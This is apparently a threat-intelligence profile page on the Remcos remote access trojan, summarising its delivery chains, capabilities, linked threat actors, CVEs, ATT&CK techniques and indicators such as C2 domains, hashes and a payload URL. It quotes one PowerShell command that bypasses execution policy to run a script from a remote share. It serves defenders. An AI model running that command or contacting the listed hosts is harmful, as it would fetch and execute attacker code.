Remcos
Remcos RAT (Remote Control & Surveillance) is a commodity Windows remote access trojan/backdoor used by a wide range of threat actors and criminal campaigns. The provided content describes it being delivered through multiple initial access chains, including phishing emails, malicious ZIP archives, weaponized LNK shortcuts, HTML/HTA and PowerShell loaders, WinRAR SFX archives with deceptive double extensions such as .pdf.scr, WebDAV/search-ms abuse, ClickFix pages, GuLoader, and DLL sideloading. Observed lures included payment slips, tax documents, technical documentation, and business-themed files. In several campaigns, execution relied on LOLBINs and trusted Windows components such as regsvr32.exe, mshta.exe, PowerShell, forfiles.exe, curl.exe, finger.exe, and WMI/Invoke-CimMethod, with some chains operating largely in memory to reduce disk artifacts.
Capabilities directly mentioned in the content include screen capture, audio capture, keylogging, browser credential theft, file and process management, automated data exfiltration, and general remote administration/backdoor functionality. Remcos can hide itself by injecting into another process, can use TLS/SSL to encrypt C2 communications, and can serialize collected data with Protobuf. The content also associates Remcos with registry-based persistence and policy modification behavior, including Registry Run keys/startup persistence and disabling Windows Notification Center. MITRE ATT&CK mappings explicitly referenced for Remcos include T1105, T1547.001, and T1056.001.
The malware is repeatedly described as widely used across commodity crimeware and intrusion activity. Threat actors and clusters explicitly linked in the content to using or delivering Remcos include Gorgon Group, Elfin/APT33, Gamaredon Group, Scarlet Goldfinch, BlackToad, and Nigerian BEC actors in the SilverTerrier ecosystem. The content also notes Remcos use in campaigns targeting corporate networks, Russian companies involved in business-process automation software, and sectors such as high-tech, wholesale, manufacturing, and broader enterprise environments.
High-confidence indicators and infrastructure mentioned in the content include gainesboro[.]duckdns[.]org:30277 with botnet name QB-1 from a Trellix-observed Remcos configuration; pmitm.ddns.net and lordtoad.duckdns.org from a JUMPSEC-observed campaign; 84.54.44[.]3:443 in a Scarlet Goldfinch DLL-sideloaded Remcos chain; wmpssvc[.]online:8080, weventlog[.]store:80, and wscsvc[.]online:4080 from a campaign targeting Russian companies; sportsboulevard-shop[.]com/9827/service.exe as a Remcos download URL in that same campaign; mytaxclientcopy[.]com and HTA file xlab22.hta (hash 1b26f7e369e39312e4fcbc993d483b17) from a Qualys-observed fileless chain; and GuLoader-related indicators including Google Drive URLs used to fetch shellcode and a Remcos payload, plus encrypted/decrypted Remcos payload MD5 values bcea24378a2134429ca82164827f1c25 and d5335a1ec161a8430e564bc66c16f894. Additional campaign identifiers explicitly mentioned for one Remcos sample are Sun004 and mutex Sun003-SHQIGL.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
4 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
"...Colombian organizations were reported by Darktrace to have been targeted by Blind Eagle in an attack campaign involving the abuse of the Windows vulnerability, tracked as CVE-2024-43451, that has been ongoing since November."
...triggers an exploit for a years-old security flaw in Microsoft Office (CVE-2017-11882) to distribute a new variant of Remcos RAT...
Windows Office Product Spawned Uncommon Process ... CVE-2023-21716 Word RTF Heap Corruption, CVE-2023-36884 Office and Windows HTML RCE Vulnerability ...
Group-IB Threat Intelligence unit discovered a zero-day vulnerability, CVE-2023-38831, in WinRAR, a popular compression tool. Cybercriminals exploited this vulnerability to deliver various malware families, including DarkMe and GuLoader, by crafting ZIP archives with spoofed extensions. | The malware was distributed alongside other malware families, such as GuLoader and Remcos RAT, via malicious ZIP archives posted on popular trading forums or distributed via file-sharing services.
Groups observed using it
35 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Security professionals recently discovered a highly dangerous malicious email operation targeting corporate networks. Specifically, threat actors initiated a sophisticated Remcos RAT phishing campaign... This structural evolution within the Remcos RAT phishing campaign allows the primary remote access trojan module to initialize smoothly.
Security professionals recently discovered a highly dangerous malicious email operation targeting corporate networks. Specifically, threat actors initiated a sophisticated Remcos RAT phishing campaign... This structural evolution within the Remcos RAT phishing campaign allows the primary remote access trojan module to initialize smoothly.
Security professionals recently discovered a highly dangerous malicious email operation targeting corporate networks. Specifically, threat actors initiated a sophisticated Remcos RAT phishing campaign... This structural evolution within the Remcos RAT phishing campaign allows the primary remote access trojan module to initialize smoothly.
SmartApeSG campaign uses ClickFix page to push Remcos RAT
Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.
In a shift from Scarlet Goldfinch’s usual payload, the malicious DLL sideloads the Remcos remote access tool, replacing the expected NetSupport Manager.
Remcos has a command to hide itself through injecting into another process.
Remcos (Backdoor.Remvio): A commodity remote administration tool (RAT) that can be used to steal information from an infected computer.
MITRE ATT&CK Technique Malware Families T1105 ... Remcos ... T1547.001 ... Remcos ... T1056.001 ... Remcos ...
The attackers typically use targeted phishing emails with malicious files disguised as legitimate documents to gain initial access, and deploy backdoors such as BrockenDoor, as well as other malware including Remcos and DarkGate.
Every lure document references Ukrainian military asset management procedures, and every one of them is a weaponized LNK file that downloads Remcos RAT through a geo-fenced PowerShell chain.
UAC-0010 (Gamaredon) LNK → PS → DLL (Remcos RAT) Strong delivery overlap, different PS techniques and infrastructure
This was the first time Proofpoint observed UAC-0050 deliver NetSupport, as it has historically used other malware including Remcos and Lumma Stealer, but it has previously used RMMs including Litemanager and Remote Manipulator System (RMS).
The campaign, active as recently as March 24, 2026, delivered four separate malware payloads to a single infected host in one session: Remcos RAT, NetSupport RAT, StealC, and Sectop RAT, also known as ArechClient2.
The campaign, active as recently as March 24, 2026, delivered four separate malware payloads to a single infected host in one session: Remcos RAT, NetSupport RAT, StealC, and Sectop RAT, also known as ArechClient2.
The expanded toolkit in this phase incorporated commodity tools such as Remcos RAT, Stealerium, StormKitty, and ZZ Stealer...
"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."
"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."
"...VBS scripts meant to load second-stage malware, which were usually open-source remote access trojans like Remcos RAT or AsyncRAT..."
TAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS RAT, XWorm, and LimeRAT, among others.
"Some of the payloads identified for campaign 2... included... RAT Remcos"
This activity is significant as it indicates the presence of the Remcos RAT, which performs keylogging, clipboard capturing, and audio recording.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This activity is significant as it indicates the presence of the Remcos RAT, which performs keylogging, clipboard capturing, and audio recording.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This activity is significant as it indicates the presence of the Remcos RAT, which performs keylogging, clipboard capturing, and audio recording.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This activity is significant as it indicates the presence of the Remcos RAT, which performs keylogging, clipboard capturing, and audio recording.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
This behavior is significant as it indicates potential compromise by the Remcos RAT, a remote access Trojan used for unauthorized access and data exfiltration.
Techniques & procedures
34 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
3 techniquesSecurity professionals recently discovered a highly dangerous malicious email operation targeting corporate networks. Specifically, threat actors initiated a sophisticated Remcos RAT phishing campaign using localized financial themes.
“The infection begins with a phishing email containing a malicious Windows batch file named Bestellung.CMD as an attachment.”
MITRE ATT&CK® Techniques ... Initial Access T1566.002 ... Spearphishing Link
Execution
8 techniquesMITRE ATT&CK® Techniques ... Execution ... T1053 Scheduled Task/Job ... Persistence T1053 Scheduled Task/Job
A sophisticated PowerShell-based shellcode loader executing Remcos Remote Access Trojan (RAT) has emerged...
In this variant, SwiftCopy shortcut file runs the PowerShell executable (powershell.exe) with the following parameters: ‘-ExecutionPolicy Bypass’ ... ‘-File \\internetshortcuts[.]link@80\ePWXBTXU\over.ps1’
“The infection begins with a phishing email containing a malicious Windows batch file named Bestellung.CMD as an attachment.”
The embedded Visual Basic script drops internet connectivity by running the local ipconfig application.
Subsequently, the script loads a renamed AutoIt3 interpreter to handle core decryption actions.
Upon clicking the link in email or attachment, recipient would be redirected to the website abusing “search-ms” URI protocol handler.
As a result, the user is more likely to open the file, assuming it is from their own system, and unknowingly execute malicious code.
Persistence
3 techniquesMITRE ATT&CK® Techniques ... Execution ... T1053 Scheduled Task/Job ... Persistence T1053 Scheduled Task/Job
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include: 'APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key'; 'APT28 has deployed malware that has copied itself to the startup directory for persistence'; 'FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.'
Privilege Escalation
4 techniquesMITRE ATT&CK® Techniques ... Execution ... T1053 Scheduled Task/Job ... Persistence T1053 Scheduled Task/Job
After unpacking the core archives, the malware moves into an advanced code injection stage.
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder. | Examples include: 'APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key'; 'APT28 has deployed malware that has copied itself to the startup directory for persistence'; 'FIN7 malware has created Registry Run and RunOnce keys to establish persistence, and has also added items to the Startup folder.'
Stealth
7 techniquesThis eventually led to the execution of obfuscated PowerShell code that unpacked and ran Lumma Stealer in memory... The attackers hid the final payload inside an old Program Information File format, further lowering the chance that users or tools would catch it.
The application drops an active interpreter along with a fake graphic file. Although the graphic element looks completely normal, it contains hidden script parameters.
After unpacking the core archives, the malware moves into an advanced code injection stage.
The program decodes these items at runtime via a simple single-byte mathematical conversion.
“It then invokes SyncAppvPublishingServer.vbs, which is a legitimate Microsoft App-V component commonly present in enterprise Windows environments.”
If the victim clicks on the opened shortcut file, then the malicious DLL file referenced in the command line is executed using the regsvr32.exe utility.
The loader leverages a specialized position-independent execution stub known as DonutLoader shellcode.
Discovery
3 techniquesMITRE ATT&CK® Techniques ... Discovery T1012 Query Registry
The embedded Visual Basic script drops internet connectivity by running the local ipconfig application ... Finally, the script executes an ipconfig command to safely restore the server’s network connection.
MITRE ATT&CK® Techniques ... Discovery T1082 System Information Discovery
Collection
3 techniquesOnce established, Remcos RAT provides attackers with extensive capabilities including screen capture, keylogging...
Archives were the top delivery method in Q2 2025, making up 40 percent of observed threats... One delivery chain involved IMG archives attached to phishing emails.
Specifically, the pipeline drops legitimate archiving utilities onto the host disk to ensure reliable local execution.
Command and Control
8 techniquesKapeka utilizes JSON objects to send and receive information from command and control nodes. Emotet has used Google’s Protobufs to serialize data sent to and from the C2 server. Remcos can serialize collected data with Protobuf.
Further we see usage of PROPFIND method ... GET method is used to retrieve the content of the file ... MITRE ATT&CK® Techniques ... Command and Control T1071 Application Layer Protocol
The hidden process connects to cloud storage nodes to retrieve compressed helper tools.
C2 traffic from ADVSTORESHELL is encrypted, then encoded with Base64 encoding... APT19 HTTP malware variant used Base64 to encode communications to the C2 server... APT33 has used base64 to encode command and control traffic.
4H RAT has the capability to create a remote shell. AuditCred can open a reverse shell on the system to execute commands. PlugX allows actors to spawn a reverse shell on a victim. QuasarRAT can launch a remote shell to execute commands on the victim’s machine.
These dedicated communication points utilize popular dynamic DNS service providers to maintain stable connections . For example, the decrypted configuration references three separate tracking domains resolving to an identical destination.
MITRE ATT&CK® Techniques ... Command and Control T1571 Non-Standard Port
For all the network activity, the attacker has employed SSL (Secure Sockets Layer) encryption as a clever tactic to evade network protection measures.
IOCs tracked for this family
505 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Remote access trojan delivered via phishing email attachment that abuses legitimate Windows administrative components, stages payloads from cloud storage, and uses DonutLoader shellcode for runtime-independent in-memory payload delivery to evade detection and enable compromise and potential data exfiltration.
Remote access trojan delivered via phishing emails using disguised WinRAR SFX archives and dual extensions. The campaign uses a Visual Basic script and a renamed AutoIt3 interpreter, temporarily disrupts network connectivity with ipconfig during second-stage execution to evade detection, then decrypts its configuration with RC4 and connects to redundant dynamic-DNS-based C2 infrastructure.
Remote access trojan used for persistent access after compromise.
A remote access trojan commonly delivered via steganographic image campaigns. In the described chain, it is extracted via a DotNET Loader and injected into memory of legitimate processes to evade EDR, with privilege escalation and fileless persistence support via the loader.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.